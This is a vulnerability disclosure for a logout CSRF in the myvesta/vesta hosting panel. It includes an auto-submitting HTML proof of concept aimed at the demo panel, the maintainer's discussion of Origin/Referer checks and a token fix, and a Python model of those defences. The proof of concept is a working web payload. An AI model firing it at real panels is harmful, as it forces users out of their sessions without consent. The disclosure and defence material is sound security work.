Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


✍️ Description

An attacker can log a user out of the panel: if a logged-in user visits a page the attacker controls, that page issues a request to /logout/ on the user's behalf and the browser sends the user's session cookie with it.

🕵️‍♂️ Proof of Concept

1. While logged in to the panel, open this POC.html in a browser.
2. Observe that you have been logged out without intending to.

<html>
<body>
<!-- Rewrite the visible URL so the victim does not see the PoC file name -->
<script>history.pushState('', '', '/')</script>
<!-- No method attribute: the form submits a GET to /logout/ as a top-level
     navigation, and the browser attaches the victim's panel cookies -->
<form action="https://demo.myvesta.com/logout/">
<input type="submit" value="Submit request" />
</form>
<!-- Auto-submit: no user interaction required -->
<script>
document.forms[0].submit();
</script>
</body>
</html>

💥 Impact

This vulnerability lets an attacker force an admin or a regular user to be logged out unintentionally, invalidating their session.

💥 Test

Tested on Edge, Firefox, Chrome and Safari.

📍 Location

index.php#L3

📝 References

csrf

We have contacted a member of the myvesta/vesta team and are waiting to hear back 3 months ago
Musio modified their report
3 months ago
Musio modified their report
3 months ago
myvesta
3 months ago

Maintainer


I think this will not be fixed, because we use /logout/ in so many places on the hosting panel, without passing the token. Moreover, to quote the guy from HestiaCP (that is also affected by this 'issue'): "If we require a token, it will mean that if I don't have that token I can't log out any more" "There are no issues, it just reduces usability... the only thing that can be done is log out the user..."

However, we implemented CSRF protection on the top level, checking both HTTP_ORIGIN and HTTP_REFERER - https://github.com/myvesta/vesta/blob/5262b3f4470e7a937dccd3b9d537d6d1543bbca4/web/inc/secure_login.php#L53-L109

I will confirm this CSRF, but I'm not sure if this can be considered as a fix.

myvesta validated this vulnerability 3 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta
3 months ago

Maintainer


Looks like we are linking /logout/ from only 4 places. OK, we will add a token there.
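The two layers discussed in the maintainer's comments above, the top-level Origin/Referer check and the per-session token added to the /logout/ links, modelled in Python as an added example. This is not myvesta/vesta code: the host name, the request dictionaries, the header values and the `handle_logout` function are constructed for the illustration.

```python
"""Model of the two CSRF defences discussed for a logout endpoint.

Added illustration, not code from myvesta/vesta. PANEL_HOST, the request
dicts and the handler below are assumptions made for the example.
"""
import hmac
import secrets
from urllib.parse import urlsplit

PANEL_HOST = "demo.myvesta.com"  # assumed panel host for the example


def issue_token():
    """Per-session token: kept server-side and embedded in the panel's logout links."""
    return secrets.token_urlsafe(32)


def same_site_by_headers(headers, panel_host=PANEL_HOST):
    """Top-level layer in the spirit of checking HTTP_ORIGIN and HTTP_REFERER.

    Origin is preferred when present; Referer is the fallback. The check
    fails closed when neither header is present, because a GET form
    submission carries no Origin header and a cross-site page can suppress
    Referer, so "no header" must not be treated as "same site".
    """
    origin = headers.get("Origin")
    if origin:
        return urlsplit(origin).hostname == panel_host
    referer = headers.get("Referer")
    if referer:
        return urlsplit(referer).hostname == panel_host
    return False


def token_valid(request_token, session_token):
    """Constant-time comparison of the token in the link with the session's token."""
    if not request_token or not session_token:
        return False
    return hmac.compare_digest(request_token, session_token)


def handle_logout(request, session):
    """Return (status, message). The session is cleared only if both layers pass."""
    if not same_site_by_headers(request.get("headers", {})):
        return 403, "blocked: cross-site request (Origin/Referer)"
    if not token_valid(request.get("query", {}).get("token"), session.get("token")):
        return 403, "blocked: missing or wrong token"
    session.clear()
    return 302, "logged out"


def demo():
    """Run three constructed requests against a fresh copy of one session."""
    session = {"user": "admin", "token": issue_token()}
    # 1. The PoC above: top-level GET from the attacker's page, no token.
    poc = {"headers": {"Referer": "https://attacker.example/"}, "query": {}}
    # 2. Same request with Referer suppressed by the attacker's page.
    poc_no_referer = {"headers": {}, "query": {}}
    # 3. A logout link clicked inside the panel, carrying the session token.
    legit = {
        "headers": {"Referer": "https://%s/list/user/" % PANEL_HOST},
        "query": {"token": session["token"]},
    }
    results = {}
    for name, req in (("poc", poc), ("poc_no_referer", poc_no_referer), ("legit", legit)):
        status, _ = handle_logout(req, dict(session))
        results[name] = status
    return results


if __name__ == "__main__":
    print(demo())
```

The header layer alone is enough to reject the PoC as posted, since the attacker's page appears in Referer; the token is what makes the endpoint robust against a page that sends neither header, at the usability cost the maintainer and the HestiaCP quote describe (a bare /logout/ URL typed by hand no longer works).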

Musio
3 months ago

Researcher


Nice work. This may seem to have little impact, but as my friend says, CSRF has impact when we can perform an action on the database. In this situation the attacker can invalidate the user's session, therefore I report this kind of issue every time I find it.

And this is right: "if I don't have the token, I must not be able to log out."

myvesta confirmed that a fix has been merged on 9a746e 3 months ago
myvesta has been awarded the fix bounty